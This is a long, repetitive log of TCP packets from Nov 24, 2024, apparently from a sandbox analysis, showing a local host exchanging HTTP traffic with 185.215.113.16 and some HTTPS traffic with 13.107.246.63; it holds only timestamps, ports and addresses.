                                                                                                                                                                        Nov 24, 2024 05:11:42.287585974 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.287698030 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.287746906 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.289983988 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.290096998 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.290143967 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.292401075 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.292434931 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.292479992 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.294754028 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.294800043 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.294850111 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.297147989 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.297252893 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.297297955 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.299542904 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.299753904 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.299807072 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.301970005 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.302154064 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.302201986 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.304367065 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.304440975 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.304486036 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.306710958 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.306869030 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.306911945 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.309115887 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.309216976 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.309262037 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.311445951 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.364572048 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.373498917 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.373713970 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.373783112 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.374429941 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.374557018 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.374615908 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.374986887 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.375052929 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.375111103 CET49762443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:42.375360966 CET49762443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:42.375360966 CET49762443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:42.375396967 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.375421047 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.376215935 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.376332998 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.376414061 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.378037930 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.378138065 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.378175974 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.378741980 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:42.378777027 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.378840923 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:42.379107952 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:42.379118919 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.379837036 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.380002022 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.380055904 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.381571054 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.381676912 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.381736040 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.383308887 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.383363962 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.383451939 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.385086060 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.385159016 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.385210037 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.386751890 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.386857033 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.386912107 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.388421059 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.388530016 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.388593912 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.390084982 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.390201092 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.390255928 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.391746044 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.391788006 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.391834974 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.393357992 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.393461943 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.393513918 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.394982100 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.395000935 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.395061970 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.396586895 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.396687031 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.396742105 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.398155928 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.398262024 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.398313999 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.399713039 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.399797916 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.399848938 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.401266098 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.401365995 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.401410103 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.402796984 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.402915001 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.402962923 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.404335022 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.404469967 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.404517889 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.405908108 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.405987978 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.406034946 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.407371044 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.407463074 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.407509089 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.408858061 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.408966064 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.409009933 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.410345078 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.410456896 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.410499096 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.411820889 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.411863089 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.411911011 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.413311005 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.413407087 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.413461924 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.414756060 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.414877892 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.414923906 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.416234016 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.416263103 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.416305065 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.417649031 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.417701006 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.417768002 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.419107914 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.419159889 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.419212103 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.420533895 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.420639038 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.420705080 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.421942949 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.422064066 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.422111034 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.423372030 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.423505068 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.423552990 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.424773932 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.424894094 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.424940109 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.426147938 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.426193953 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.426239967 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.427542925 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.427658081 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.427705050 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.428936958 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.428992033 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.429038048 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.430325031 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.430438042 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.430495977 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.431158066 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.431267977 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.431309938 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.432043076 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.432152987 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.432208061 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.432884932 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.432996988 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.433039904 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.433763027 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.433860064 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.433911085 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.434617996 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.434660912 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.434706926 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.435475111 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.435573101 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.435620070 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.436347008 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.436430931 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.436477900 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.437216997 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.437314987 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.437361956 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.438056946 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.438178062 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.438227892 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.438915014 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.439019918 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.439066887 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.439784050 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.439881086 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.439929008 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.440629005 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.440735102 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.440781116 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.441483974 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.441560030 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.441608906 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.442326069 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.442394018 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.442442894 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.443197012 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.443324089 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.443375111 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.444020033 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.489595890 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.565517902 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.565661907 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.565754890 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.565886021 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.566070080 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.566123009 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.566194057 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.566966057 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.566987991 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.567008972 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.567868948 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.567918062 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.567941904 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.568705082 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.568762064 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.568804026 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.569509983 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.569569111 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.569576025 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.570377111 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.570426941 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.570499897 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.571213007 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.571271896 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.571289062 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.572107077 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.572173119 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.572223902 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.572966099 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.573019981 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.573093891 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.573853016 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.573911905 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.573959112 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.574660063 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.574717045 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.574759007 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.575515985 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.575548887 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.575577974 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.576385021 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.576488972 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.576524019 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.577291012 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.577347040 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.577389002 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.578088999 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.578145027 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.578193903 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.578983068 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.579027891 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.579057932 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.579793930 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.579842091 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.579906940 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.580676079 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.580730915 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.580817938 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.581543922 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.581597090 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.581634998 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.582393885 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.582442045 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.582513094 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.583271027 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.583328962 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.583365917 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.584136009 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.584217072 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.584229946 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.584964037 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.585017920 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.585202932 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.585814953 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.585863113 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.585913897 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.586687088 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.586733103 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.586783886 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.587616920 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.587656021 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.587680101 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.588408947 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.588452101 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.588502884 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.589277983 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.589323044 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:42.589364052 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:42.590115070 CET8049761185.215.113.16192.168.2.7
